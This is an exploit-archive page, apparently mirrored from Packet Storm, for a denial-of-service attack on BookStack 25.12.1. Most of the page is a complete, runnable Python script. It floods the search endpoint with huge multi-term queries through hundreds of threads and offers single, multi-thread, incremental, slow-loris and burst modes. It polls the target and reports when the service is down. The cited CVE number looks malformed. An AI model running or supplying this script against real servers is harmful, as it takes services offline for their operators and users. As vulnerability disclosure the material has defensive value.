Lucene search
K

πŸ“„ BookStack Denial of Service

πŸ—“οΈΒ 16 Jun 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 39Β Views

BookStack 25.12.1 DoS via search term resource exhaustion using large queries and high concurrency.

Code
==================================================================================================================================
    | # Title     : BookStack 25.12.1 Denial of Service via Search Term Resource Exhaustion                                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://www.bookstackapp.com                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    :  This script a denial of service condition against a BookStack search endpoint by generating extremely large search queries and sending them with high levels of concurrency.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import time
    import argparse
    import threading
    import urllib3
    from urllib.parse import quote
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from datetime import datetime
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class BookStackDoS:
        def __init__(self, target_url, cookie=None, verbose=False):
            self.base_url = target_url.rstrip('/')
            self.cookie = cookie
            self.verbose = verbose
            self.search_url = f"{self.base_url}/search"
            self.stop_attack = threading.Event()
            self.session = requests.Session()
            if cookie:
                self.session.headers['Cookie'] = cookie
            self.request_count = 0
            self.error_count = 0
            self.lock = threading.Lock()
        def log(self, msg, level="INFO"):
            timestamp = datetime.now().strftime("%H:%M:%S")
            if level == "SUCCESS":
                print(f"\033[92m[{timestamp}] [+] {msg}\033[0m")
            elif level == "ERROR":
                print(f"\033[91m[{timestamp}] [-] {msg}\033[0m")
            elif level == "WARNING":
                print(f"\033[93m[{timestamp}] [!] {msg}\033[0m")
            elif level == "DEBUG" and self.verbose:
                print(f"\033[94m[{timestamp}] [*] {msg}\033[0m")
            else:
                print(f"\033[96m[{timestamp}] [*] {msg}\033[0m")
        def generate_search_payload(self, generic_terms=100, exact_terms=50, tag_terms=30):
            """Generate massive search payload to exhaust database"""
            generic = [f"t{i}" for i in range(generic_terms)]
            exact = [f"\"e{i}\"" for i in range(exact_terms)]
            tags = [f"[t{i}=v{i}]" for i in range(tag_terms)]
            all_terms = generic + exact + tags
            return " ".join(all_terms)
        def generate_max_payload(self):
            """Generate maximum size payload (most destructive)"""
            return self.generate_search_payload(200, 100, 50)
        def generate_moderate_payload(self):
            """Generate moderate payload (80% of max)"""
            return self.generate_search_payload(100, 50, 30)
        def generate_light_payload(self):
            """Generate light payload for testing"""
            return self.generate_search_payload(30, 15, 10)
        def get_search_term_count(self, payload):
            """Count number of search terms in payload"""
            return len(payload.split())
        def check_service_status(self):
            """Check if BookStack service is responding"""
            try:
                response = self.session.get(self.base_url, timeout=5)
                return response.status_code == 200
            except:
                return False
        def send_search_request(self, payload, timeout=30):
            """Send a single search request with the payload"""
            encoded_payload = quote(payload)
            url = f"{self.search_url}?term={encoded_payload}"
            try:
                response = self.session.get(url, timeout=timeout)
                with self.lock:
                    self.request_count += 1
                if self.verbose:
                    self.log(f"Request completed: HTTP {response.status_code}", "DEBUG")
                return response
            except requests.exceptions.Timeout:
                with self.lock:
                    self.error_count += 1
                self.log(f"Request timeout", "DEBUG")
                return None
            except Exception as e:
                with self.lock:
                    self.error_count += 1
                self.log(f"Request error: {e}", "DEBUG")
                return None
        def single_request_attack(self, payload_size="max"):
            """Simple single request attack"""
            if payload_size == "max":
                payload = self.generate_max_payload()
            elif payload_size == "moderate":
                payload = self.generate_moderate_payload()
            else:
                payload = self.generate_light_payload()
            term_count = self.get_search_term_count(payload)
            self.log(f"Sending single search request with {term_count} terms", "WARNING")
            self.log(f"Payload preview: {payload[:200]}...", "DEBUG")
            url_length = len(self.search_url) + len(payload) + 10
            self.log(f"Request URL length: {url_length} bytes")
            start_time = time.time()
            response = self.send_search_request(payload, timeout=60)
            elapsed = time.time() - start_time
            if response:
                self.log(f"Request completed in {elapsed:.2f}s with HTTP {response.status_code}")
            else:
                self.log(f"Request failed or timed out after {elapsed:.2f}s")
        def multi_thread_attack(self, threads=150, duration=30, payload_size="moderate"):
            """Multi-threaded attack to exhaust resources"""
            if payload_size == "max":
                payload = self.generate_max_payload()
            else:
                payload = self.generate_moderate_payload()
            term_count = self.get_search_term_count(payload)
            self.log(f"Starting multi-thread attack with {threads} threads for {duration}s")
            self.log(f"Each request contains {term_count} search terms")
            self.request_count = 0
            self.error_count = 0
            self.stop_attack.clear()
            def worker():
                while not self.stop_attack.is_set():
                    self.send_search_request(payload, timeout=30)
                    time.sleep(0.01)
            workers = []
            for _ in range(threads):
                t = threading.Thread(target=worker, daemon=True)
                t.start()
                workers.append(t)
            start_time = time.time()
            last_healthy_check = time.time()
            service_crashed = False
            while time.time() - start_time < duration:
                time.sleep(2)
                elapsed = int(time.time() - start_time)
                if time.time() - last_healthy_check >= 5:
                    if self.check_service_status():
                        self.log(f"[{elapsed}s] Service ONLINE - Requests: {self.request_count}, Errors: {self.error_count}")
                    else:
                        self.log(f"[{elapsed}s] Service OFFLINE! - DOS Successful!", "SUCCESS")
                        service_crashed = True
                        break
                    last_healthy_check = time.time()
                else:
                    self.log(f"[{elapsed}s] Attack ongoing - {self.request_count} requests sent", "INFO")
            self.stop_attack.set()
            for t in workers:
                t.join(timeout=2)
            self.log(f"Attack completed: {self.request_count} requests, {self.error_count} errors")
            time.sleep(5)
            if self.check_service_status():
                if service_crashed:
                    self.log("Service recovered after attack", "WARNING")
                else:
                    self.log("Service remained online throughout attack", "ERROR")
            else:
                self.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
        def incremental_attack(self, start_threads=10, max_threads=200, increment=20, duration_per_phase=10):
            """Gradually increase attack intensity to find threshold"""
            self.log("Starting incremental attack to find DoS threshold")
            self.log(f"Threads: {start_threads} -> {max_threads} (increment: {increment})")
            for threads in range(start_threads, max_threads + 1, increment):
                self.log(f"\n--- Phase: {threads} threads ---")
                payload = self.generate_moderate_payload()
                self.request_count = 0
                self.error_count = 0
                self.stop_attack.clear()
                workers = []
                for _ in range(threads):
                    t = threading.Thread(
                        target=self.send_search_request,
                        args=(payload,),
                        daemon=True
                    )
                    t.start()
                    workers.append(t)
                start_time = time.time()
                crashed = False
                while time.time() - start_time < duration_per_phase:
                    time.sleep(1)
                    if not self.check_service_status():
                        self.log(f"Service crashed at {threads} threads!", "SUCCESS")
                        crashed = True
                        break
                self.stop_attack.set()
                for t in workers:
                    t.join(timeout=1)
                if crashed:
                    self.log(f"DoS threshold found: {threads} threads")
                    break
                else:
                    self.log(f"Service survived {threads} threads")
                time.sleep(5)
        def slow_loris_attack(self, duration=60, interval=0.5):
            """Slow attack that gradually exhausts resources"""
            self.log(f"Starting Slow Loris style attack for {duration} seconds")
            payload = self.generate_moderate_payload()
            start_time = time.time()
            request_count = 0
            while time.time() - start_time < duration:
                # Send request with delay
                self.send_search_request(payload, timeout=10)
                request_count += 1
                if request_count % 10 == 0:
                    self.log(f"Sent {request_count} slow requests")
                if not self.check_service_status():
                    self.log("Service crashed during slow attack!", "SUCCESS")
                    break
                time.sleep(interval)
            self.log(f"Slow attack completed: {request_count} requests")
        def massive_burst_attack(self, burst_size=500):
            """Send massive burst of simultaneous requests"""
            self.log(f"Starting massive burst attack with {burst_size} simultaneous requests")
            payload = self.generate_moderate_payload()
            with ThreadPoolExecutor(max_workers=burst_size) as executor:
                futures = [executor.submit(self.send_search_request, payload) for _ in range(burst_size)]
                completed = 0
                for future in as_completed(futures):
                    completed += 1
                    if completed % 50 == 0:
                        self.log(f"Completed {completed}/{burst_size} requests")
            self.log(f"Burst completed: {self.request_count} successful, {self.error_count} errors")
            time.sleep(3)
            if self.check_service_status():
                self.log("Service survived burst attack", "WARNING")
            else:
                self.log("Service crashed from burst attack!", "SUCCESS")
    def banner():
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    β•‘  BookStack 25.12.1 - Denial of Service (Search Term Exhaustion) β•‘
    β•‘  Resource Exhaustion via Massive Search Queries                 β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-1970573 - BookStack DoS via Search Term Resource Exhaustion"
        )
        parser.add_argument("-u", "--url", required=True, help="Target BookStack URL")
        parser.add_argument("-c", "--cookie", help="Cookie for authenticated requests")
        parser.add_argument("-t", "--threads", type=int, default=150, help="Number of threads (default: 150)")
        parser.add_argument("-d", "--duration", type=int, default=30, help="Attack duration in seconds (default: 30)")
        parser.add_argument("-m", "--mode", choices=["single", "multi", "incremental", "slow", "burst"], 
                            default="multi", help="Attack mode (default: multi)")
        parser.add_argument("-p", "--payload", choices=["light", "moderate", "max"], 
                            default="moderate", help="Payload size (default: moderate)")
        parser.add_argument("--monitor", action="store_true", help="Monitor service status only")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        args = parser.parse_args()
        banner()
        exploit = BookStackDoS(args.url, args.cookie, args.verbose)
        if args.monitor:
            exploit.log("Monitoring service status...")
            while True:
                if exploit.check_service_status():
                    exploit.log("Service ONLINE")
                else:
                    exploit.log("Service OFFLINE", "ERROR")
                time.sleep(5)
            return
        if not exploit.check_service_status():
            exploit.log("Service is not responding. Check URL and network.", "ERROR")
            return
        exploit.log(f"Target: {args.url}")
        exploit.log(f"Service is ONLINE, starting attack...")
        if args.mode == "single":
            exploit.single_request_attack(args.payload)
        elif args.mode == "multi":
            threads = args.threads
            duration = args.duration
            exploit.multi_thread_attack(threads, duration, args.payload)
        elif args.mode == "incremental":
            exploit.incremental_attack()
        elif args.mode == "slow":
            exploit.slow_loris_attack(args.duration)
        elif args.mode == "burst":
            exploit.massive_burst_attack(args.threads)
        time.sleep(5)
        if exploit.check_service_status():
            exploit.log("Service still responding after attack", "WARNING")
        else:
            exploit.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("\n[!] Interrupted by user")
            sys.exit(0)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation